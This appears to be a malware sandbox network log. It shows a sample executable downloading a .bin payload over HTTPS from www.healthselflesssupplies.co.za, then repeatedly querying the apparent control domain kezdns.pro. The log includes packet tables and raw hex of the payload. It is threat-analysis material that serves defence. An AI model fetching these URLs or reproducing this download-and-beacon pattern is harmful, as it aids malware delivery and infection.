                                                Jan 11, 2025 08:11:50.389664888 CET44349867164.160.91.32192.168.2.11
                                                Jan 11, 2025 08:11:50.389777899 CET49867443192.168.2.11164.160.91.32
                                                Jan 11, 2025 08:11:50.389803886 CET44349867164.160.91.32192.168.2.11
                                                Jan 11, 2025 08:11:50.389847994 CET49867443192.168.2.11164.160.91.32
                                                Jan 11, 2025 08:11:50.389925003 CET49867443192.168.2.11164.160.91.32
                                                Jan 11, 2025 08:11:50.390063047 CET44349867164.160.91.32192.168.2.11
                                                Jan 11, 2025 08:11:50.390078068 CET44349867164.160.91.32192.168.2.11
                                                Jan 11, 2025 08:11:50.390121937 CET49867443192.168.2.11164.160.91.32
                                                Jan 11, 2025 08:11:50.390130043 CET44349867164.160.91.32192.168.2.11
                                                Jan 11, 2025 08:11:50.390186071 CET49867443192.168.2.11164.160.91.32
                                                Jan 11, 2025 08:11:50.390645981 CET44349867164.160.91.32192.168.2.11
                                                Jan 11, 2025 08:11:50.390670061 CET44349867164.160.91.32192.168.2.11
                                                Jan 11, 2025 08:11:50.390697956 CET49867443192.168.2.11164.160.91.32
                                                Jan 11, 2025 08:11:50.390714884 CET44349867164.160.91.32192.168.2.11
                                                Jan 11, 2025 08:11:50.390748024 CET49867443192.168.2.11164.160.91.32
                                                Jan 11, 2025 08:11:50.390774012 CET49867443192.168.2.11164.160.91.32
                                                Jan 11, 2025 08:11:50.390831947 CET44349867164.160.91.32192.168.2.11
                                                Jan 11, 2025 08:11:50.390902042 CET49867443192.168.2.11164.160.91.32
                                                Jan 11, 2025 08:11:50.390903950 CET44349867164.160.91.32192.168.2.11
                                                Jan 11, 2025 08:11:50.390970945 CET49867443192.168.2.11164.160.91.32
                                                Jan 11, 2025 08:11:50.391024113 CET49867443192.168.2.11164.160.91.32
                                                Jan 11, 2025 08:11:50.391035080 CET44349867164.160.91.32192.168.2.11
                                                Jan 11, 2025 08:11:50.391046047 CET49867443192.168.2.11164.160.91.32
                                                Jan 11, 2025 08:11:50.391079903 CET49867443192.168.2.11164.160.91.32
                                                TimestampSource PortDest PortSource IPDest IP
                                                Jan 11, 2025 08:11:47.296338081 CET5960853192.168.2.111.1.1.1
                                                Jan 11, 2025 08:11:47.727479935 CET53596081.1.1.1192.168.2.11
                                                Jan 11, 2025 08:11:52.749174118 CET5156053192.168.2.111.1.1.1
                                                Jan 11, 2025 08:11:52.757822037 CET53515601.1.1.1192.168.2.11
                                                Jan 11, 2025 08:11:57.846646070 CET5240153192.168.2.111.1.1.1
                                                Jan 11, 2025 08:11:57.855345964 CET53524011.1.1.1192.168.2.11
                                                Jan 11, 2025 08:12:02.923938990 CET6228453192.168.2.111.1.1.1
                                                Jan 11, 2025 08:12:02.939137936 CET53622841.1.1.1192.168.2.11
                                                Jan 11, 2025 08:12:08.103056908 CET5473353192.168.2.111.1.1.1
                                                Jan 11, 2025 08:12:08.112057924 CET53547331.1.1.1192.168.2.11
                                                Jan 11, 2025 08:12:13.224217892 CET6423353192.168.2.111.1.1.1
                                                Jan 11, 2025 08:12:13.232880116 CET53642331.1.1.1192.168.2.11
                                                Jan 11, 2025 08:12:18.298834085 CET6232653192.168.2.111.1.1.1
                                                Jan 11, 2025 08:12:18.314027071 CET53623261.1.1.1192.168.2.11
                                                Jan 11, 2025 08:12:23.392553091 CET5247453192.168.2.111.1.1.1
                                                Jan 11, 2025 08:12:23.401057959 CET53524741.1.1.1192.168.2.11
                                                Jan 11, 2025 08:12:28.276556015 CET6148553192.168.2.111.1.1.1
                                                Jan 11, 2025 08:12:28.286782026 CET53614851.1.1.1192.168.2.11
                                                Jan 11, 2025 08:12:32.423985004 CET5802753192.168.2.111.1.1.1
                                                Jan 11, 2025 08:12:32.438194990 CET53580271.1.1.1192.168.2.11
                                                Jan 11, 2025 08:12:37.950933933 CET6444553192.168.2.111.1.1.1
                                                Jan 11, 2025 08:12:37.959409952 CET53644451.1.1.1192.168.2.11
                                                Jan 11, 2025 08:12:42.642726898 CET6243953192.168.2.111.1.1.1
                                                Jan 11, 2025 08:12:42.761764050 CET53624391.1.1.1192.168.2.11
                                                Jan 11, 2025 08:12:47.597134113 CET6429053192.168.2.111.1.1.1
                                                Jan 11, 2025 08:12:47.612893105 CET53642901.1.1.1192.168.2.11
                                                Jan 11, 2025 08:12:52.517741919 CET5503053192.168.2.111.1.1.1
                                                Jan 11, 2025 08:12:52.532412052 CET53550301.1.1.1192.168.2.11
                                                Jan 11, 2025 08:12:57.408377886 CET5670953192.168.2.111.1.1.1
                                                Jan 11, 2025 08:12:57.416127920 CET53567091.1.1.1192.168.2.11
                                                Jan 11, 2025 08:13:02.440567017 CET6304353192.168.2.111.1.1.1
                                                Jan 11, 2025 08:13:02.447915077 CET53630431.1.1.1192.168.2.11
                                                Jan 11, 2025 08:13:07.620408058 CET5442253192.168.2.111.1.1.1
                                                Jan 11, 2025 08:13:07.628957033 CET53544221.1.1.1192.168.2.11
                                                Jan 11, 2025 08:13:12.408036947 CET5165953192.168.2.111.1.1.1
                                                Jan 11, 2025 08:13:12.415141106 CET53516591.1.1.1192.168.2.11
                                                Jan 11, 2025 08:13:17.408344030 CET5667253192.168.2.111.1.1.1
                                                Jan 11, 2025 08:13:17.416748047 CET53566721.1.1.1192.168.2.11
                                                Jan 11, 2025 08:13:22.408279896 CET6531153192.168.2.111.1.1.1
                                                Jan 11, 2025 08:13:22.422918081 CET53653111.1.1.1192.168.2.11
                                                Jan 11, 2025 08:13:27.408499956 CET5662453192.168.2.111.1.1.1
                                                Jan 11, 2025 08:13:27.426017046 CET53566241.1.1.1192.168.2.11
                                                Jan 11, 2025 08:13:32.640294075 CET5624653192.168.2.111.1.1.1
                                                Jan 11, 2025 08:13:32.655653000 CET53562461.1.1.1192.168.2.11
                                                Jan 11, 2025 08:13:37.408659935 CET6383353192.168.2.111.1.1.1
                                                Jan 11, 2025 08:13:37.424369097 CET53638331.1.1.1192.168.2.11
                                                Jan 11, 2025 08:13:42.407958984 CET6178353192.168.2.111.1.1.1
                                                Jan 11, 2025 08:13:42.418760061 CET53617831.1.1.1192.168.2.11
                                                Jan 11, 2025 08:13:47.411034107 CET5985353192.168.2.111.1.1.1
                                                Jan 11, 2025 08:13:47.528084993 CET53598531.1.1.1192.168.2.11
                                                Jan 11, 2025 08:13:52.408683062 CET5492953192.168.2.111.1.1.1
                                                Jan 11, 2025 08:13:52.425332069 CET53549291.1.1.1192.168.2.11
                                                Jan 11, 2025 08:13:57.408204079 CET6484553192.168.2.111.1.1.1
                                                Jan 11, 2025 08:13:57.417026043 CET53648451.1.1.1192.168.2.11
                                                Jan 11, 2025 08:14:02.408425093 CET5813753192.168.2.111.1.1.1
                                                Jan 11, 2025 08:14:02.423821926 CET53581371.1.1.1192.168.2.11
                                                Jan 11, 2025 08:14:07.408188105 CET5006453192.168.2.111.1.1.1
                                                Jan 11, 2025 08:14:07.418863058 CET53500641.1.1.1192.168.2.11
                                                Jan 11, 2025 08:14:12.408461094 CET5613253192.168.2.111.1.1.1
                                                Jan 11, 2025 08:14:12.417370081 CET53561321.1.1.1192.168.2.11
                                                Jan 11, 2025 08:14:17.458120108 CET5801453192.168.2.111.1.1.1
                                                Jan 11, 2025 08:14:17.465418100 CET53580141.1.1.1192.168.2.11
                                                Jan 11, 2025 08:14:22.408385992 CET6243853192.168.2.111.1.1.1
                                                Jan 11, 2025 08:14:22.423768044 CET53624381.1.1.1192.168.2.11
                                                Jan 11, 2025 08:14:27.408042908 CET5654853192.168.2.111.1.1.1
                                                Jan 11, 2025 08:14:27.415432930 CET53565481.1.1.1192.168.2.11
                                                Jan 11, 2025 08:14:32.408355951 CET5129953192.168.2.111.1.1.1
                                                Jan 11, 2025 08:14:32.416743994 CET53512991.1.1.1192.168.2.11
                                                Jan 11, 2025 08:14:37.408133984 CET5671553192.168.2.111.1.1.1
                                                Jan 11, 2025 08:14:37.416119099 CET53567151.1.1.1192.168.2.11
                                                Jan 11, 2025 08:14:42.409060955 CET6136053192.168.2.111.1.1.1
                                                Jan 11, 2025 08:14:42.415999889 CET53613601.1.1.1192.168.2.11
                                                Jan 11, 2025 08:14:47.408030033 CET5618153192.168.2.111.1.1.1
                                                Jan 11, 2025 08:14:47.415050983 CET53561811.1.1.1192.168.2.11
                                                Jan 11, 2025 08:14:52.408279896 CET6358753192.168.2.111.1.1.1
                                                Jan 11, 2025 08:14:52.415859938 CET53635871.1.1.1192.168.2.11
                                                Jan 11, 2025 08:14:57.408123016 CET6145553192.168.2.111.1.1.1
                                                Jan 11, 2025 08:14:57.415507078 CET53614551.1.1.1192.168.2.11
                                                Jan 11, 2025 08:15:02.408325911 CET6244153192.168.2.111.1.1.1
                                                Jan 11, 2025 08:15:02.415847063 CET53624411.1.1.1192.168.2.11
                                                Jan 11, 2025 08:15:07.408106089 CET6281853192.168.2.111.1.1.1
                                                Jan 11, 2025 08:15:07.415273905 CET53628181.1.1.1192.168.2.11
                                                Jan 11, 2025 08:15:12.409050941 CET6081053192.168.2.111.1.1.1
                                                Jan 11, 2025 08:15:12.418734074 CET53608101.1.1.1192.168.2.11
                                                Jan 11, 2025 08:15:17.409604073 CET6259253192.168.2.111.1.1.1
                                                Jan 11, 2025 08:15:17.417228937 CET53625921.1.1.1192.168.2.11
                                                Jan 11, 2025 08:15:22.408072948 CET5877753192.168.2.111.1.1.1
                                                Jan 11, 2025 08:15:22.416134119 CET53587771.1.1.1192.168.2.11
                                                Jan 11, 2025 08:15:28.116154909 CET5075553192.168.2.111.1.1.1
                                                Jan 11, 2025 08:15:28.124474049 CET53507551.1.1.1192.168.2.11
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jan 11, 2025 08:11:47.296338081 CET192.168.2.111.1.1.10xefc0Standard query (0)www.healthselflesssupplies.co.zaA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:11:52.749174118 CET192.168.2.111.1.1.10xa05Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:11:57.846646070 CET192.168.2.111.1.1.10x9b95Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:02.923938990 CET192.168.2.111.1.1.10x8e1dStandard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:08.103056908 CET192.168.2.111.1.1.10xa6fcStandard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:13.224217892 CET192.168.2.111.1.1.10xad84Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:18.298834085 CET192.168.2.111.1.1.10xe039Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:23.392553091 CET192.168.2.111.1.1.10xbb04Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:28.276556015 CET192.168.2.111.1.1.10x2b7cStandard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:32.423985004 CET192.168.2.111.1.1.10x9801Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:37.950933933 CET192.168.2.111.1.1.10x3fcaStandard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:42.642726898 CET192.168.2.111.1.1.10xe826Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:47.597134113 CET192.168.2.111.1.1.10x31a2Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:52.517741919 CET192.168.2.111.1.1.10x66b8Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:57.408377886 CET192.168.2.111.1.1.10x9b85Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:02.440567017 CET192.168.2.111.1.1.10xdf43Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:07.620408058 CET192.168.2.111.1.1.10x6ef9Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:12.408036947 CET192.168.2.111.1.1.10x2713Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:17.408344030 CET192.168.2.111.1.1.10x2a3eStandard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:22.408279896 CET192.168.2.111.1.1.10x469Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:27.408499956 CET192.168.2.111.1.1.10xbbdeStandard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:32.640294075 CET192.168.2.111.1.1.10x83d8Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:37.408659935 CET192.168.2.111.1.1.10x45e5Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:42.407958984 CET192.168.2.111.1.1.10x146dStandard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:47.411034107 CET192.168.2.111.1.1.10xf950Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:52.408683062 CET192.168.2.111.1.1.10x9cfbStandard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:57.408204079 CET192.168.2.111.1.1.10x7d95Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:02.408425093 CET192.168.2.111.1.1.10x28ddStandard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:07.408188105 CET192.168.2.111.1.1.10x441Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:12.408461094 CET192.168.2.111.1.1.10xb559Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:17.458120108 CET192.168.2.111.1.1.10xdce6Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:22.408385992 CET192.168.2.111.1.1.10x9f76Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:27.408042908 CET192.168.2.111.1.1.10x32fdStandard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:32.408355951 CET192.168.2.111.1.1.10xa9c7Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:37.408133984 CET192.168.2.111.1.1.10xd282Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:42.409060955 CET192.168.2.111.1.1.10xe731Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:47.408030033 CET192.168.2.111.1.1.10xdf4aStandard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:52.408279896 CET192.168.2.111.1.1.10x8739Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:57.408123016 CET192.168.2.111.1.1.10xf0b0Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:15:02.408325911 CET192.168.2.111.1.1.10xe6e2Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:15:07.408106089 CET192.168.2.111.1.1.10x1b58Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:15:12.409050941 CET192.168.2.111.1.1.10x1e92Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:15:17.409604073 CET192.168.2.111.1.1.10xd5d1Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:15:22.408072948 CET192.168.2.111.1.1.10xf06aStandard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:15:28.116154909 CET192.168.2.111.1.1.10x4fc5Standard query (0)kezdns.proA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jan 11, 2025 08:11:47.727479935 CET1.1.1.1192.168.2.110xefc0No error (0)www.healthselflesssupplies.co.zahealthselflesssupplies.co.zaCNAME (Canonical name)IN (0x0001)false
                                                Jan 11, 2025 08:11:47.727479935 CET1.1.1.1192.168.2.110xefc0No error (0)healthselflesssupplies.co.za164.160.91.32A (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:11:52.757822037 CET1.1.1.1192.168.2.110xa05Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:11:57.855345964 CET1.1.1.1192.168.2.110x9b95Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:02.939137936 CET1.1.1.1192.168.2.110x8e1dName error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:08.112057924 CET1.1.1.1192.168.2.110xa6fcName error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:13.232880116 CET1.1.1.1192.168.2.110xad84Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:18.314027071 CET1.1.1.1192.168.2.110xe039Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:23.401057959 CET1.1.1.1192.168.2.110xbb04Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:28.286782026 CET1.1.1.1192.168.2.110x2b7cName error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:32.438194990 CET1.1.1.1192.168.2.110x9801Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:37.959409952 CET1.1.1.1192.168.2.110x3fcaName error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:42.761764050 CET1.1.1.1192.168.2.110xe826Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:47.612893105 CET1.1.1.1192.168.2.110x31a2Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:52.532412052 CET1.1.1.1192.168.2.110x66b8Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:12:57.416127920 CET1.1.1.1192.168.2.110x9b85Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:02.447915077 CET1.1.1.1192.168.2.110xdf43Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:07.628957033 CET1.1.1.1192.168.2.110x6ef9Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:12.415141106 CET1.1.1.1192.168.2.110x2713Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:17.416748047 CET1.1.1.1192.168.2.110x2a3eName error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:22.422918081 CET1.1.1.1192.168.2.110x469Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:27.426017046 CET1.1.1.1192.168.2.110xbbdeName error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:32.655653000 CET1.1.1.1192.168.2.110x83d8Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:37.424369097 CET1.1.1.1192.168.2.110x45e5Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:42.418760061 CET1.1.1.1192.168.2.110x146dName error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:47.528084993 CET1.1.1.1192.168.2.110xf950Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:52.425332069 CET1.1.1.1192.168.2.110x9cfbName error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:13:57.417026043 CET1.1.1.1192.168.2.110x7d95Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:02.423821926 CET1.1.1.1192.168.2.110x28ddName error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:07.418863058 CET1.1.1.1192.168.2.110x441Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:12.417370081 CET1.1.1.1192.168.2.110xb559Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:17.465418100 CET1.1.1.1192.168.2.110xdce6Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:22.423768044 CET1.1.1.1192.168.2.110x9f76Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:27.415432930 CET1.1.1.1192.168.2.110x32fdName error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:32.416743994 CET1.1.1.1192.168.2.110xa9c7Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:37.416119099 CET1.1.1.1192.168.2.110xd282Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:42.415999889 CET1.1.1.1192.168.2.110xe731Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:47.415050983 CET1.1.1.1192.168.2.110xdf4aName error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:52.415859938 CET1.1.1.1192.168.2.110x8739Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:14:57.415507078 CET1.1.1.1192.168.2.110xf0b0Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:15:02.415847063 CET1.1.1.1192.168.2.110xe6e2Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:15:07.415273905 CET1.1.1.1192.168.2.110x1b58Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:15:12.418734074 CET1.1.1.1192.168.2.110x1e92Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:15:17.417228937 CET1.1.1.1192.168.2.110xd5d1Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:15:22.416134119 CET1.1.1.1192.168.2.110xf06aName error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                Jan 11, 2025 08:15:28.124474049 CET1.1.1.1192.168.2.110x4fc5Name error (3)kezdns.prononenoneA (IP address)IN (0x0001)false
                                                • www.healthselflesssupplies.co.za
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.1149867164.160.91.324437876C:\Users\user\Desktop\ix8kxoBHDb.exe
                                                TimestampBytes transferredDirectionData
                                                2025-01-11 07:11:48 UTC193OUTGET /cdOCcPHZK213.bin HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                Host: www.healthselflesssupplies.co.za
                                                Cache-Control: no-cache
                                                2025-01-11 07:11:49 UTC404INHTTP/1.1 200 OK
                                                Connection: close
                                                content-type: application/octet-stream
                                                last-modified: Wed, 04 Dec 2024 06:17:51 GMT
                                                accept-ranges: bytes
                                                content-length: 493120
                                                date: Sat, 11 Jan 2025 07:11:49 GMT
                                                server: LiteSpeed
                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                2025-01-11 07:11:49 UTC964INData Raw: 38 cf cb cf 33 cc 2a f1 ee 1a 86 6c 1b ee 11 f5 dc 7f 1e 40 25 c3 f3 75 52 43 f2 6c 9e de 8d 17 78 2b 25 8d fa 8c ac 2c 8b 20 bb c6 53 25 2d 58 d1 b1 2e 01 35 18 5e f3 10 60 1d f1 c6 33 61 65 a1 09 2b 25 14 17 fe 05 5d c8 08 94 f8 bb 25 71 a3 a7 d0 44 7c df 02 bc 8c e3 bf c7 ac a3 3a 4b 08 ec 04 9d aa fa 0e 2c 12 6f ce f5 8b a3 66 6e 12 fa 0e 50 df 9b 00 6c 45 4b 89 81 ed b1 d1 f9 f8 21 e0 95 32 94 e9 20 d7 de 37 f0 44 92 d7 54 f7 91 80 2b 89 55 e2 39 c8 5b 9d 34 10 e9 1b 90 3a 4e 33 db d5 9f 30 e9 c0 9a 63 b7 33 da 6c 87 12 4b 0c cc cc 6e 0b 52 0b af a2 9b a5 38 ba ed 33 6e 48 90 22 40 aa b9 31 77 31 cf 77 75 fd b4 d9 ff 2c 75 55 ba 6d 7e d0 5d c6 34 6a a4 85 0c 58 9a 2e 01 95 55 91 35 5f 3a 11 6f 3a bb d9 de fc 5e c9 95 4a ab eb 53 81 23 44 da eb 28 48
                                                Data Ascii: 83*l@%uRClx+%, S%-X.5^`3ae+%]%qD|:K,ofnPlEK!2 7DT+U9[4:N30c3lKnR83nH"@1w1wu,uUm~]4jX.U5_:o:^JS#D(H
                                                2025-01-11 07:11:49 UTC14994INData Raw: fa d4 2c ec 7a 15 0a e5 f1 f0 83 cc df 7a 87 51 de 6b f5 a0 4b 09 fe 1f 37 b1 98 ef d2 cc a9 e0 58 94 ed ca 83 c2 88 bb f3 fd ea 91 d6 99 4d 57 25 aa ea 1e 1b e4 ce 58 79 a1 28 84 28 d5 0e 87 49 2a 84 69 42 09 65 7f a3 9c 20 ec 74 e2 3f 69 77 fc 1f 41 79 20 0f 21 b3 d0 be 71 f8 ee a6 f3 7b 63 2e 60 b1 f7 2a ba d8 55 6a b0 28 32 d2 37 e3 eb 2d 05 ff 59 ca 46 f6 03 12 3d 10 bd 62 02 52 ee ef dc bc 95 b5 dd 2b 24 09 89 05 24 15 ad 07 bc 6b ae cc a7 10 d0 5a 80 69 4f 8d 63 61 73 bc 80 4a b5 4d b1 97 e2 90 c0 5d 80 87 7c 4c 4a cd 2a 22 4d a0 bb fa 7f 70 1e 89 34 3a d0 da 04 81 2b 9c 2c 3b 78 58 28 0f cf 79 fe ea fa 83 6e ed 20 51 4c 26 e9 eb 18 e9 6a ea 64 59 b0 89 94 6b fc 74 33 47 1a 90 64 79 d5 09 7f 64 ae fb af d5 1b dd fe 2d b6 b8 b9 1e cd 28 ee 55 af 2f
                                                Data Ascii: ,zzQkK7XMW%Xy((I*iBe t?iwAy !q{c.`*Uj(27-YF=bR+$$kZiOcasJM]|LJ*"Mp4:+,;xX(yn QL&jdYkt3Gdyd-(U/
                                                2025-01-11 07:11:49 UTC16384INData Raw: d5 25 70 bd ea 37 f6 f9 c1 5a c4 96 76 65 f3 fe c8 bf 1d 63 f1 13 88 89 75 c3 b0 96 62 5b 30 72 bb d8 b1 f6 a0 5f 08 cd ac 44 05 cb e9 ee b7 94 67 12 5e 64 33 10 eb 32 2a 60 d8 b4 91 be 8e a2 d9 0d ad a5 25 83 93 f6 2e c0 83 65 58 58 8e 9b f5 e9 a2 37 f4 e2 5a 6c 27 ff eb c4 19 61 d4 3f 43 4d c7 0a e0 88 d0 23 3c 1c a0 e6 b7 4c 8e 5c dd 3d db d6 1b fc a2 22 80 67 01 f6 54 44 9f 34 b9 63 7c d4 50 db 20 db 63 a1 bb 72 0a 0a ac 0a 58 f5 71 07 e7 d0 d8 5c cb 36 cc 1b 4c 13 8d 24 4d 1d 73 5f 4a 21 c5 f0 c6 7e 12 19 50 8f 00 36 7e 06 0e 13 57 8c 06 6e a3 a3 73 9d f6 25 41 37 48 bb 5f 7d d1 95 f2 c7 96 77 8b 6d 21 70 bb 89 67 b1 ab 30 4b 92 4f 88 57 0e 35 b6 3b 24 b8 f1 5b 32 24 d7 7b 33 bd f7 c1 7c 6b 63 e6 d3 16 ab d2 e6 0e 75 f8 9a bb e6 ec e0 46 29 89 14 04
                                                Data Ascii: %p7Zvecub[0r_Dg^d32*`%.eXX7Zl'a?CM#<L\="gTD4c|P crXq\6L$Ms_J!~P6~Wns%A7H_}wm!pg0KOW5;$[2${3|kcuF)
